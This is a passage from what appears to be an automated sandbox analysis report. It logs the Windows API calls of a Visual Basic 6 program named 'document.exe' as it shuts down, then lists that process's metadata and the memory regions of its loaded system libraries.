CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x40278, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0204.547] IsChild (hWndParent=0x7028c, hWnd=0x702b6) returned 0 [0204.547] GetWindow (hWnd=0x7028c, uCmd=0x5) returned 0x0 [0204.547] DestroyWindow (hWnd=0x7028c) returned 1 [0204.547] NtdllDefWindowProc_A (hWnd=0x7028c, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0204.547] SendMessageA (hWnd=0x7028c, Msg=0x80, wParam=0x0, lParam=0x0) returned 0x60231 [0204.547] NtdllDefWindowProc_A (hWnd=0x7028c, Msg=0x80, wParam=0x0, lParam=0x0) returned 0x60231 [0204.548] DestroyCursor (hCursor=0x60231) returned 1 [0204.548] SelectObject (hdc=0x770109b2, h=0x18a002e) returned 0x650a07c3 [0204.548] NtdllDefWindowProc_A (hWnd=0x7028c, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0204.976] SelectObject (hdc=0x770109b2, h=0x18a002e) returned 0x18a002e [0204.976] SelectObject (hdc=0x770109b2, h=0x1b00016) returned 0x9f3009b1 [0204.976] DeleteObject (ho=0x9f3009b1) returned 1 [0204.976] SelectObject (hdc=0x770109b2, h=0x1900015) returned 0x1900015 [0204.976] SelectObject (hdc=0x770109b2, h=0x1900015) returned 0x1900015 [0204.976] ReleaseDC (hWnd=0x7028c, hDC=0x770109b2) returned 1 [0204.976] NtdllDefWindowProc_A (hWnd=0x7028c, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0204.976] GetFocus () returned 0x0 [0204.976] GetCurrentThreadId () returned 0x94c [0204.977] PeekMessageA (in: lpMsg=0x18fc80, hWnd=0x40222, wMsgFilterMin=0x1047, wMsgFilterMax=0x1047, wRemoveMsg=0x0 | out: lpMsg=0x18fc80) returned 0 [0204.977] PostMessageA (hWnd=0x40222, Msg=0x1047, wParam=0x0, lParam=0x0) returned 1 [0204.977] IMalloc:Free (This=0x75e366bc, pv=0x5df050) [0204.977] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x1061, wParam=0x0, lParam=0x0) returned 0x0 [0204.977] SendMessageA (hWnd=0x40222, Msg=0x1050, wParam=0x0, lParam=0x0) returned 0x0 [0204.977] GetCurrentThreadId () returned 0x94c [0204.977] GetCurrentThreadId () returned 0x94c [0204.977] GetCurrentThreadId () returned 0x94c [0204.977] GetCurrentThreadId () returned 0x94c [0204.977] lstrcpyA (in: lpString1=0x18fa58, lpString2="" | out: lpString1="") returned="" [0204.977] lstrlenA (lpString="") returned 0 [0204.977] lstrcpyA (in: lpString1=0x18f850, lpString2="" | out: lpString1="") returned="" [0204.977] lstrcpynA (in: lpString1=0x18f428, lpString2="", iMaxLength=260 | out: lpString1="") returned="" [0204.977] lstrlenA (lpString="") returned 0 [0204.978] lstrcpyA (in: lpString1=0x237b818, lpString2="" | out: lpString1="") returned="" [0204.978] lstrlenA (lpString="") returned 0 [0204.978] lstrlenA (lpString=".HLP") returned 4 [0204.978] lstrcpyA (in: lpString1=0x18f544, lpString2="" | out: lpString1="") returned="" [0204.978] lstrcatA (in: lpString1="", lpString2=".HLP" | out: lpString1=".HLP") returned=".HLP" [0204.978] lstrcpynA (in: lpString1=0x18f308, lpString2=".HLP", iMaxLength=260 | out: lpString1=".HLP") returned=".HLP" [0204.978] lstrlenA (lpString=".HLP") returned 4 [0204.978] lstrcpyA (in: lpString1=0x237b838, lpString2=".HLP" | out: lpString1=".HLP") returned=".HLP" [0204.981] lstrcpyA (in: lpString1=0x2372278, lpString2="C:\\Windows\\system32" | out: lpString1="C:\\Windows\\system32") returned="C:\\Windows\\system32" [0204.981] lstrcpynA (in: lpString1=0x18f304, lpString2=".HLP", iMaxLength=260 | out: lpString1=".HLP") returned=".HLP" [0204.982] lstrlenA (lpString=".HLP") returned 4 [0204.982] lstrlenA (lpString="C:\\Windows\\system32") returned 19 [0204.982] lstrlenA (lpString="C:\\Windows\\system32") returned 19 [0204.982] lstrcatA (in: lpString1="C:\\Windows\\system32", lpString2="\\" | out: lpString1="C:\\Windows\\system32\\") returned="C:\\Windows\\system32\\" [0204.982] lstrcatA (in: lpString1="C:\\Windows\\system32\\", lpString2=".HLP" | out: lpString1="C:\\Windows\\system32\\.HLP") returned="C:\\Windows\\system32\\.HLP" [0204.982] lstrlenA (lpString="C:\\Windows\\system32\\.HLP") returned 24 [0204.982] CharToOemBuffA (in: lpszSrc="C:\\Windows\\system32\\.HLP", lpszDst=0x18f308, cchDstLength=0x19 | out: lpszDst="C:\\Windows\\system32\\.HLP") returned 1 [0204.982] GetFileAttributesA (lpFileName="C:\\Windows\\system32\\.HLP" (normalized: "c:\\windows\\system32\\.hlp")) returned 0xffffffff [0204.982] GetLastError () returned 0x2 [0204.982] GetLastError () returned 0x2 [0204.982] SetLastError (dwErrCode=0x2) [0204.982] GetLastError () returned 0x2 [0204.982] SetLastError (dwErrCode=0x2) [0204.982] GetFileAttributesA (lpFileName="C:\\Windows\\system32\\.HLP" (normalized: "c:\\windows\\system32\\.hlp")) returned 0xffffffff [0204.982] GetLastError () returned 0x2 [0204.982] GetLastError () returned 0x2 [0204.982] SetLastError (dwErrCode=0x2) [0204.982] GetLastError () returned 0x2 [0204.982] SetLastError (dwErrCode=0x2) [0204.982] GetWindowsDirectoryA (in: lpBuffer=0x18f424, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0204.982] lstrlenA (lpString="C:\\Windows") returned 10 [0204.982] lstrlenA (lpString="C:\\Windows") returned 10 [0204.983] lstrlenA (lpString="C:\\Windows\\") returned 11 [0204.983] lstrcpynA (in: lpString1=0x18f308, lpString2="C:\\Windows\\Help", iMaxLength=260 | out: lpString1="C:\\Windows\\Help") returned="C:\\Windows\\Help" [0204.983] lstrlenA (lpString="C:\\Windows\\Help") returned 15 [0204.983] lstrlenA (lpString="C:\\Windows\\Help") returned 15 [0204.983] lstrcpyA (in: lpString1=0x237b780, lpString2="C:\\Windows\\Help" | out: lpString1="C:\\Windows\\Help") returned="C:\\Windows\\Help" [0204.983] lstrcpynA (in: lpString1=0x18f304, lpString2=".HLP", iMaxLength=260 | out: lpString1=".HLP") returned=".HLP" [0204.983] lstrlenA (lpString=".HLP") returned 4 [0204.983] lstrlenA (lpString="C:\\Windows\\Help") returned 15 [0204.983] lstrlenA (lpString="C:\\Windows\\Help") returned 15 [0204.983] lstrcatA (in: lpString1="C:\\Windows\\Help", lpString2="\\" | out: lpString1="C:\\Windows\\Help\\") returned="C:\\Windows\\Help\\" [0204.983] lstrcatA (in: lpString1="C:\\Windows\\Help\\", lpString2=".HLP" | out: lpString1="C:\\Windows\\Help\\.HLP") returned="C:\\Windows\\Help\\.HLP" [0204.983] lstrlenA (lpString="C:\\Windows\\Help\\.HLP") returned 20 [0204.983] CharToOemBuffA (in: lpszSrc="C:\\Windows\\Help\\.HLP", lpszDst=0x18f308, cchDstLength=0x15 | out: lpszDst="C:\\Windows\\Help\\.HLP") returned 1 [0204.983] GetFileAttributesA (lpFileName="C:\\Windows\\Help\\.HLP" (normalized: "c:\\windows\\help\\.hlp")) returned 0xffffffff [0204.986] GetLastError () returned 0x2 [0204.986] GetLastError () returned 0x2 [0204.986] SetLastError (dwErrCode=0x2) [0204.986] GetLastError () returned 0x2 [0204.986] SetLastError (dwErrCode=0x2) [0204.986] GetFileAttributesA (lpFileName="C:\\Windows\\Help\\.HLP" (normalized: "c:\\windows\\help\\.hlp")) returned 0xffffffff [0204.986] GetLastError () returned 0x2 [0204.986] GetLastError () returned 0x2 [0204.986] SetLastError (dwErrCode=0x2) [0204.986] GetLastError () returned 0x2 [0204.986] SetLastError (dwErrCode=0x2) [0204.986] lstrlenA (lpString="") returned 0 [0204.986] lstrcpyA (in: lpString1=0x18f318, lpString2="" | out: lpString1="") returned="" [0204.986] lstrlenA (lpString=".HLP") returned 4 [0204.986] lstrlenA (lpString="") returned 0 [0204.986] lstrcpynA (in: lpString1=0x18f428, lpString2="", iMaxLength=260 | out: lpString1="") returned="" [0204.986] lstrlenA (lpString="") returned 0 [0204.986] lstrcpyA (in: lpString1=0x237b780, lpString2="" | out: lpString1="") returned="" [0204.987] lstrcpyA (in: lpString1=0x18fa58, lpString2="" | out: lpString1="") returned="" [0204.987] lstrlenA (lpString="") returned 0 [0204.987] lstrlenA (lpString="") returned 0 [0204.987] lstrcatA (in: lpString1="", lpString2="" | out: lpString1="") returned="" [0204.987] GetDesktopWindow () returned 0x10010 [0204.987] CoFreeUnusedLibraries () [0204.987] GetCurrentThreadId () returned 0x94c [0204.987] DestroyWindow (hWnd=0x40222) returned 1 [0204.988] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0204.988] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0204.988] NtdllDefWindowProc_A (hWnd=0x702b6, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0204.988] NtdllDefWindowProc_A (hWnd=0x702b6, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0204.988] PostQuitMessage (nExitCode=0) [0204.988] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0204.988] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x1050, wParam=0x0, lParam=0x0) returned 0x0 [0204.989] GetCurrentThreadId () returned 0x94c [0204.989] GetCurrentThreadId () returned 0x94c [0204.989] GetCurrentThreadId () returned 0x94c [0204.989] GetCurrentThreadId () returned 0x94c [0204.989] GetCurrentThreadId () returned 0x94c [0204.989] GetCurrentThreadId () returned 0x94c [0204.989] PostMessageA (hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 1 [0204.990] GetCurrentThreadId () returned 0x94c [0204.990] GetCurrentThreadId () returned 0x94c [0204.991] GetCurrentThreadId () returned 0x94c [0204.991] GetCurrentThreadId () returned 0x94c [0204.991] GetCurrentThreadId () returned 0x94c [0204.991] GetCurrentThreadId () returned 0x94c [0204.991] GetCurrentThreadId () returned 0x94c [0204.991] GetCurrentThreadId () returned 0x94c [0204.991] GetCurrentThreadId () returned 0x94c [0204.991] GetCurrentThreadId () returned 0x94c [0204.992] GetCurrentThreadId () returned 0x94c [0204.992] GetCurrentThreadId () returned 0x94c [0204.992] PostMessageA (hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 1 [0204.993] GetCurrentThreadId () returned 0x94c [0204.993] GetCurrentThreadId () returned 0x94c [0204.994] lstrcpyA (in: lpString1=0x18fdc0, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0204.994] UnregisterClassA (lpClassName="ThunderRT6Frame", hInstance=0x72940000) returned 1 [0204.995] lstrcpyA (in: lpString1=0x18fdc0, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0204.995] UnregisterClassA (lpClassName="ThunderRT6CommandButton", hInstance=0x72940000) returned 1 [0204.995] lstrcpyA (in: lpString1=0x18fdc0, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0204.995] UnregisterClassA (lpClassName="ThunderRT6ListBox", hInstance=0x72940000) returned 1 [0204.995] lstrcpyA (in: lpString1=0x18fdc0, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0204.995] UnregisterClassA (lpClassName="ThunderRT6Form", hInstance=0x72940000) returned 1 [0204.995] lstrlenA (lpString="ThunderRT6") returned 10 [0204.995] lstrcpyA (in: lpString1=0x18fdc0, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0204.995] lstrlenA (lpString="ThunderRT6Form") returned 14 [0204.995] lstrcpynA (in: lpString1=0x18fdce, lpString2="DC", iMaxLength=29 | out: lpString1="DC") returned="DC" [0204.995] UnregisterClassA (lpClassName="ThunderRT6FormDC", hInstance=0x72940000) returned 1 [0204.995] GetCursorPos (in: lpPoint=0x18fe4c | out: lpPoint=0x18fe4c*(x=452, y=497)) returned 1 [0204.996] GetCapture () returned 0x0 [0204.996] WindowFromPoint (Point=0x1c4) returned 0x202a4 [0204.996] GetWindowThreadProcessId (in: hWnd=0x202a4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x900 [0204.996] DestroyWindow (hWnd=0x702b6) returned 0 [0204.996] DeleteDC (hdc=0x330107bb) returned 1 [0204.996] IMalloc:Free (This=0x75e366bc, pv=0x5dcf90) [0204.997] IMalloc:Free (This=0x75e366bc, pv=0x5d9930) [0204.997] IMalloc:Free (This=0x75e366bc, pv=0x5da030) [0204.997] IMalloc:Free (This=0x75e366bc, pv=0x5dd868) [0204.997] IMalloc:Free (This=0x75e366bc, pv=0x5d9958) [0204.997] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x18fe8c | out: lplpMessageFilter=0x18fe8c*=0x2362054) returned 0x0 [0204.997] UnhookWindowsHookEx (hhk=0xb02b3) returned 1 [0205.002] CoFreeUnusedLibraries () [0205.003] OleUninitialize () [0205.003] FreeLibrary (hLibModule=0x76720000) returned 1 [0205.003] ReleaseSemaphore (in: hSemaphore=0x90, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0205.003] GetCurrentThreadId () returned 0x94c Process: id = "9" image_name = "document.exe" filename = "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe" page_root = "0x2de5c000" os_pid = "0xa68" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x81c" cmd_line = "\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe\" 2 2616 18220554" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1534 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1535 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1536 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1537 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1538 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1539 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1540 start_va = 0x400000 end_va = 0x4b2fff entry_point = 0x400000 region_type = mapped_file name = "document.exe" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe") Region: id = 1541 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1542 start_va = 0x77e20000 end_va = 0x77f9ffff entry_point = 0x77e20000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1543 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1544 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1545 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1546 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1547 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1548 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1549 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1550 start_va = 0x250000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 1551 start_va = 0x752a0000 end_va = 0x752a7fff entry_point = 0x752a0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1552 start_va = 0x752b0000 end_va = 0x7530bfff entry_point = 0x752b0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1553 start_va = 0x75310000 end_va = 0x7534efff entry_point = 0x75310000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1577 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1578 start_va = 0x1a0000 end_va = 0x206fff entry_point = 0x1a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1579 start_va = 0x570000 end_va = 0x66ffff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1580 start_va = 0x800000 end_va = 0x80ffff entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 1581 start_va = 0x74ba0000 end_va = 0x74ba8fff entry_point = 0x74ba0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1582 start_va = 0x75460000 end_va = 0x754e3fff entry_point = 0x75460000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 1583 start_va = 0x75970000 end_va = 0x7597bfff entry_point = 0x75970000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1584 start_va = 0x75980000 end_va = 0x759dffff entry_point = 0x75980000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1585 start_va = 0x759e0000 end_va = 0x759f8fff entry_point = 0x759e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1586 start_va = 0x75a10000 end_va = 0x75abbfff entry_point = 0x75a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1587 start_va = 0x75c60000 end_va = 0x75cb6fff entry_point = 0x75c60000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1588 start_va = 0x75cf0000 end_va = 0x75e4bfff entry_point = 0x75cf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1589 start_va = 0x75f40000 end_va = 0x75f85fff entry_point = 0x75f40000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1590 start_va = 0x75fa0000 end_va = 0x7603cfff entry_point = 0x75fa0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1591 start_va = 0x760d0000 end_va = 0x761bffff entry_point = 0x760d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1592 start_va = 0x76220000 end_va = 0x7632ffff entry_point = 0x76220000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1593 start_va = 0x76490000 end_va = 0x7652ffff entry_point = 0x76490000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1594 start_va = 0x76720000 end_va = 0x767aefff entry_point = 0x76720000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1595 start_va = 0x76a70000 end_va = 0x76afffff entry_point = 0x76a70000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1596 start_va = 0x76b00000 end_va = 0x77749fff entry_point = 0x76b00000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1597 start_va = 0x77780000 end_va = 0x777fafff entry_point = 0x77780000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 1598 start_va = 0x77810000 end_va = 0x77819fff entry_point = 0x77810000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1599 start_va = 0x77820000 end_va = 0x7791ffff entry_point = 0x77820000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1600 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x0 region_type = private name = "private_0x0000000077a20000" filename = "" Region: id = 1601 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x0 region_type = private name = "private_0x0000000077b20000" filename = "" Region: id = 1602 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1603 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1607 start_va = 0x670000 end_va = 0x7f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1608 start_va = 0x75c00000 end_va = 0x75c5ffff entry_point = 0x75c00000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1609 start_va = 0x75e50000 end_va = 0x75f1bfff entry_point = 0x75e50000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1610 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1611 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1612 start_va = 0x3c0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 1613 start_va = 0x810000 end_va = 0x990fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 1614 start_va = 0x9a0000 end_va = 0x1d9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009a0000" filename = "" Region: id = 1615 start_va = 0x1da0000 end_va = 0x1e9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001da0000" filename = "" Region: id = 1628 start_va = 0x75210000 end_va = 0x7528ffff entry_point = 0x75210000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1629 start_va = 0x2d0000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 1634 start_va = 0x1ea0000 end_va = 0x1f7efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 1636 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1637 start_va = 0x751f0000 end_va = 0x75202fff entry_point = 0x751f0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1638 start_va = 0x1f80000 end_va = 0x20effff entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 1639 start_va = 0x20f0000 end_va = 0x2a1ffff entry_point = 0x20f0000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 1640 start_va = 0x220000 end_va = 0x226fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 1641 start_va = 0x230000 end_va = 0x231fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 1642 start_va = 0x2a20000 end_va = 0x2e12fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a20000" filename = "" Region: id = 1643 start_va = 0x2e20000 end_va = 0x2474ffff entry_point = 0x0 region_type = private name = "private_0x0000000002e20000" filename = "" Region: id = 1795 start_va = 0x240000 end_va = 0x240fff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 1796 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 1797 start_va = 0x2e0000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 1798 start_va = 0x2e20000 end_va = 0xae20fff entry_point = 0x0 region_type = private name = "private_0x0000000002e20000" filename = "" Region: id = 1799 start_va = 0x320000 end_va = 0x330fff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 1800 start_va = 0x340000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 1801 start_va = 0x350000 end_va = 0x357fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 1802 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1803 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1804 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1805 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1806 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1807 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1808 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1809 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1810 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1811 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1812 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1813 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1814 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1815 start_va = 0x340000 